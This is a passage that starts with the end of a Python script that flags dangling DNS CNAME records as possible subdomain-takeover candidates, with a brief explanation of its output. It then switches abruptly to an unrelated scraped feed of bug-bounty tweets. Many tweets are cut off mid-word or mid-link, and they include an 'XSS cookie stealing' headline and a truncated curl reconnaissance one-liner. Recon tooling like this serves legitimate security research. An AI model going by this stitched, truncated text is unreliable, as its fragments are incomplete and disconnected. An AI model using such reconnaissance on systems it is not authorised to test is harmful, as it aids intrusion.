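def parse_dig(text: str):
    """Return (status, [(owner, target), ...]) from one dig run's output."""
    m = STATUS_RE.search(text)
    status = m.group(1) if m else "UNKNOWN"
    cnames = [(o.rstrip("."), t.rstrip(".")) for o, t in CNAME_RE.findall(text)]
    return status, cnames


def find_dangling_cnames(dig_outputs: dict) -> dict:
    """Map owner -> CNAME target for lookups that returned NXDOMAIN while still
    carrying a CNAME record: the alias exists but its target no longer does.
    A plain NXDOMAIN with no CNAME (old.example.test) is just a dead name."""
    dangling = {}
    for text in dig_outputs.values():
        status, cnames = parse_dig(text)
        if status != "NXDOMAIN":
            continue
        for owner, target in cnames:
            dangling[owner] = target
    return dangling


if __name__ == "__main__":
    for owner, target in find_dangling_cnames(SAMPLE_DIG_OUTPUT).items():
        print(f"dangling: {owner} -> {target}")
```

Only blog.example.test is reported: its CNAME still points at a target that no longer resolves. Whether such a record is actually claimable depends on the provider behind the target, so the output is a list to review, not a verdict.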
Major #update to the public bounty and disclosure programs, we've added almost 200 n
- https://t.co/aLRBoIam6V
#security #recon #bugbounty #bugbountytips #infosec
RT @xerosecurity: Stay up-to-date with the latest emerging security threats, vulnerabili
#hackers #hacking #bugbounty #bugbountytips #pentesting #pentest #redteam #OSIN
RT @TrainingBug: XSS COOKIE STEALING
https://t.co/6r9hYbiBFs
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
RT @TrainingBug: XSS on non existent parameters
https://t.co/npFTgGQYS2
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
One-line bash script to get every domain on a specific IP
curl -s -k -X $'GET' -H $'Host: https://t.co/L2UFEqV7P7' --url 'https://t.co/nxZ1TBmTS
#bugbountytips #bugbountytip @rapiddns
RT @Shivam31200: A short p1 story inspired by
@ADITYASHENDE17 @Shubham_4500
#bugbounty #bugbountytips https://t.co/SpUQsl5HKM
📡via @securityweekly -pod w/ research recognition 2 @steventseeley 4 @SharePoint R
https://t.co/XBSk8E3WST
#BugBounty #bugbountytips #bugbountytip #Cyber #Security #CyberSecurity #Podcas
RT @ome_mishra: Just scored a bounty of €1000 @intigriti, check my profile: https://t.c
#HackWithIntigriti
#bugbountytips
Always try to understand the application, you will get something cool.... 🤘🏻
Very useful tool by @TomNomNom
Feed it URLs and it will give you a list of interesting ones, at least in theory, https://t.co/1GW
#BugBounty #bugbountytips
RT @CyberRitesh: #Day11 #Challenge365
1) Critical File Found
2) Source Code Disclosure
3) #tryhackme Challenges
4) WriteUps reading on #bugbounty
#bugbountytips #CyberSecurity
RT @InsiderPhD: New video!
This week we're answering a question: How do the pros find those CVEs before anyone e
#BugBounty #bugbountytips
https://t.co/MwjjfvHbLC https://t.co/BbM6qe75nx